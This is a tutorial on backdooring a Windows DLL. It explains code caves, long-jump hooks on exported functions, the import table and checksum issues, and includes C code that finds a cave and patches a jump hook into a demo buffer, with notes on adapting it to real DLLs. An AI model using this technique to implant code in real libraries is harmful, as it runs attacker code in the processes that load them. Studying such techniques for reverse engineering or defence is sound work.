BACKDOORING A DLL

avina sin asked Apr 12,2020

How does a DLL file work?


First, a little on how DLLs work. For those of you who run Linux, think of a DLL as a shared object. There are two sorts of library files, dynamic ones and static ones. A static library (.lib file) is just that: a library file that is compiled into an exe. Dynamic Link Libraries let a developer split their application into components. That way, when a fix is needed, they don't have to recompile the whole thing. They also make a program smaller in size when it relies on DLL files rather than compiling in a large static library.

How do you backdoor a DLL? The same way you backdoor any other exe: replace the entry point with your own code and jump back when you're done. In the case of a DLL, you overwrite the code of an EXPORTED function to guarantee your code is hit when that export is called. The effect is the same as a DLL hijacking attack: attacker code runs inside the process that loads the DLL. When it comes to the modification itself, you can either

  A) Try to find code caves and pack what you need inside

  B) Add another code section yourself and pack what you need in there

  C) Dynamically allocate the space you need. This implies you already have enough space to add the code that dynamically allocates more, but it's still an option. This is done via the VirtualAlloc/VirtualProtect and WriteProcessMemory Win32 APIs.


When you add your code, you have to be aware of what you call. Exes have what's called an 'import address table' (IAT), which is a table listing functions and the respective DLLs they're imported from. If you attempt to call an imported function that has no IAT entry, the loader never resolves its address and the call won't work. This means you will either need to add an entry to the IAT, meaning modify the exe header, or find some other way of calling the code dynamically. If you've ever done C development on Windows, you know you can pair LoadLibrary with GetProcAddress() to call an external DLL function. This is still an option. Shellcode developers, on the other hand, like to call functions the fancy way: resolving addresses by walking from the Thread Environment Block (TEB)/Process Environment Block (PEB) to the loaded module list and the export tables of those modules. For simplicity, I'm going to only call code that is already inside the executable image.

There are issues you will run into when trying to replace code. The obvious one is finding space in the exe to put your code. This means we'll need to find a code cave (empty space in the exe to put our code), or add another executable section. For my example, I just need about 70 bytes, so adding another section isn't necessary. I could also string a few code caves together. There's also the issue of function/program checksums: some applications won't run if they've been modified.

These little caves are generated by the compiler for the sole purpose of maintaining alignment (padding between functions up to the next 16-byte boundary, so a cave like this is at most 15 bytes) and are usually made up of either NOP (0x90) instructions or int3 instructions (0xCC); they can be changed to anything we want. This of course is difficult because you need 5 bytes for the jump, leaving you 10 bytes to do whatever before jumping to the next region. Difficult, but not impossible.

Anyway, we have our code cave; we'll need to perform a long jump to it, meaning we need at least 5 bytes of space to hold the jump (E9 followed by a 32-bit relative displacement). Anything we overwrite must be restored, and it must be whole instructions: the jump has to end on an instruction boundary, and the stolen instructions are replayed in the cave before we jump back. Looking at the exported entry for 'uGetOpenFileName', I see a perfect spot for a long jump to our code cave without wrecking the subroutine too much.
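The cave search and the long-jump patch described in the last few paragraphs, as an added example written for this edit; it is not code from the original post. It works on a plain byte buffer standing in for one section of the DLL, so it runs on any host without Windows APIs. The "exported function" bytes, the int3 cave and the payload are constructed x86 bytes, and the names find_cave, install_hook, demo and the offsets are assumptions of the example. It also assumes the stolen bytes were picked from the disassembly so they end on an instruction boundary and contain no relative jumps or calls, which is the judgement the post makes by hand for uGetOpenFileName.

```c
/* Added example (not code from the original post): find a NOP/int3 code
 * cave in one section of a PE and hook an exported function with a
 * 5-byte long jump into it. Portable C on a plain byte buffer; the
 * function bytes, cave and payload below are constructed, not real. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define JMP_LEN 5           /* E9 rel32 */
#define OP_JMP  0xE9
#define OP_NOP  0x90
#define OP_INT3 0xCC

/* Scan a section image for a run of NOP/int3 padding at least min_len
 * bytes long. Returns its offset and stores its length, or -1 if none. */
static long find_cave(const uint8_t *sec, size_t len, size_t min_len, size_t *cave_len)
{
    size_t i = 0;
    while (i < len) {
        if (sec[i] != OP_NOP && sec[i] != OP_INT3) { i++; continue; }
        size_t start = i;
        while (i < len && (sec[i] == OP_NOP || sec[i] == OP_INT3)) i++;
        if (i - start >= min_len) {
            if (cave_len) *cave_len = i - start;
            return (long)start;
        }
    }
    return -1;
}

/* rel32 is measured from the end of the jmp instruction; stored little-endian. */
static void put_rel32(uint8_t *at, long jmp_end, long target)
{
    uint32_t r = (uint32_t)(int32_t)(target - jmp_end);
    at[0] = (uint8_t)r;         at[1] = (uint8_t)(r >> 8);
    at[2] = (uint8_t)(r >> 16); at[3] = (uint8_t)(r >> 24);
}

static long get_rel32(const uint8_t *at)
{
    uint32_t r = at[0] | (at[1] << 8) | (at[2] << 16) | ((uint32_t)at[3] << 24);
    return (long)(int32_t)r;
}

/* Hook the function at func_off. stolen_len bytes (>= 5, chosen from the
 * disassembly so they end on an instruction boundary and hold no relative
 * jumps/calls) are overwritten with "jmp cave" plus NOP padding; the cave
 * receives payload, the stolen bytes, and a jmp back to func_off + stolen_len.
 * All offsets lie in one section, so file-offset deltas equal RVA deltas.
 * Returns 0 on success, -1 on bad arguments (buffer is left untouched). */
static int install_hook(uint8_t *sec, size_t len,
                        size_t func_off, size_t stolen_len,
                        size_t cave_off, size_t cave_len,
                        const uint8_t *payload, size_t payload_len)
{
    size_t need = payload_len + stolen_len + JMP_LEN;
    if (stolen_len < JMP_LEN || need > cave_len) return -1;
    if (func_off + stolen_len > len || cave_off + cave_len > len) return -1;
    if (func_off < cave_off + cave_len && cave_off < func_off + stolen_len) return -1; /* overlap */

    uint8_t *c = sec + cave_off;
    memcpy(c, payload, payload_len);
    memcpy(c + payload_len, sec + func_off, stolen_len);   /* restore the stolen code */
    c[payload_len + stolen_len] = OP_JMP;
    put_rel32(c + payload_len + stolen_len + 1,
              (long)(cave_off + need), (long)(func_off + stolen_len));

    sec[func_off] = OP_JMP;                                 /* long jump into the cave */
    put_rel32(sec + func_off + 1, (long)(func_off + JMP_LEN), (long)cave_off);
    memset(sec + func_off + JMP_LEN, OP_NOP, stolen_len - JMP_LEN);
    return 0;
}

/* Constructed section image: a fake export at FUNC_OFF (push ebp; mov ebp,esp;
 * sub esp,0x40; push ebx; push esi), ret filler elsewhere, and 32 bytes of
 * int3 standing in for the padding at the end of the section. */
#define SEC_LEN  96
#define FUNC_OFF 16
#define STOLEN   6   /* push ebp; mov ebp,esp; sub esp,0x40: whole instructions, no rel32 */
static uint8_t g_sec[SEC_LEN];
static const uint8_t k_func[]    = { 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x40, 0x53, 0x56 };
static const uint8_t k_payload[] = { 0x60, 0x90, 0x90, 0x61 };  /* pushad; nop; nop; popad */

static int demo(void)
{
    memset(g_sec, 0xC3, SEC_LEN);
    memcpy(g_sec + FUNC_OFF, k_func, sizeof k_func);
    memset(g_sec + SEC_LEN - 32, OP_INT3, 32);
    size_t cave_len = 0;
    long cave = find_cave(g_sec, SEC_LEN, sizeof k_payload + STOLEN + JMP_LEN, &cave_len);
    if (cave < 0) return -1;
    return install_hook(g_sec, SEC_LEN, FUNC_OFF, STOLEN,
                        (size_t)cave, cave_len, k_payload, sizeof k_payload);
}

int main(void)
{
    if (demo() != 0) { puts("hook failed"); return 1; }
    long rel = get_rel32(g_sec + FUNC_OFF + 1);
    printf("hooked: E9 rel32=%ld, cave at section offset %ld\n", rel, FUNC_OFF + JMP_LEN + rel);
    return 0;
}
```

On a real DLL the same arithmetic applies to RVAs: if the cave and the function live in different sections, convert both through the section headers before computing rel32, because raw file offsets and virtual addresses differ. The cave's section also needs IMAGE_SCN_MEM_EXECUTE set, and if the application checks the PE checksum (or its own) that has to be recomputed or the check removed, which is the checksum problem the post mentions.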

